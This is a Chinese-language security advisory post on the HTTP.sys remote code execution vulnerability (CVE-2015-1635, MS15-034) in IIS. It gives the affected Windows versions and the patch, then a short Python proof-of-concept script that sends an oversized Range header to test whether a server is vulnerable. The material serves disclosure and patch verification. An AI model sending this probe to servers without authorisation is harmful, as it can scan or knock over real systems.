【安全告警】HTTP.sys 远程执行代码漏洞(CVE-2015-1635)
在微软4月14日补丁日发布的补丁中,有一个针对IIS服务器的远程代码执行漏洞危害非常大,请广大用户注意。
漏洞信息
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此漏洞。
危害评级
严重
影响范围
影响以下版本操作系统的IIS服务器
Windows 7
Windows 8
Windows server 2008
Windows server 2012
修复方法
目前微软官方已经给出修复补丁(3042553),用户安装修复补丁即可。
参考
https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx
https://support.microsoft.com/zh-cn/kb/3042553
附测试POC
注:此脚本可验证服务器是否存在漏洞,但并没有经过充分的测试,不排除会产生不可预知的后果,请谨慎使用!
import
socket
import
random
ipAddr
=
""
hexAllFfff
=
"18446744073709551615"
req1
=
"GET / HTTP/1.0\r\n\r\n"
req
=
"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-"
+
hexAllFfff
+
"\r\n\r\n"
print
"[*] Audit Started"
client_socket
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr,
80
))
client_socket.send(req1)
boringResp
=
client_socket.recv(
1024
)
if
"Microsoft"
not
in
boringResp:
print
"[*] Not IIS"
exit(
0
)
client_socket.close()
client_socket
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr,
80
))
client_socket.send(req)
goodResp
=
client_socket.recv(
1024
)
if
"Requested Range Not Satisfiable"
in
goodResp:
print
"[!!] Looks VULN"
elif
" The request has an invalid header name"
in
goodResp:
print
"[*] Looks Patched"
else
:
print
"[*] Unexpected response, cannot discern patch status"
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 总书记深深牵挂雪域高原上的人们 4923399
- 2 直击小米汽车上市发布会 4923198
- 3 小米首款汽车SU7起售价21.59万 4899533
- 4 抓住“热辣滚烫”的“春日经济” 4720457
- 5 蚂蚁集团杭州退地 周边房价直降2万 4644820
- 6 雷军称小米SU7续航遥遥领先 4502151
- 7 小米SU7首发共9款颜色 4478594
- 8 荷兰首相在华回应ASML出口管制问题 4323934
- 9 面具男用病毒针扎人系谣言 4298499
- 10 电梯维修工带纸片人冒充同事工作 4158940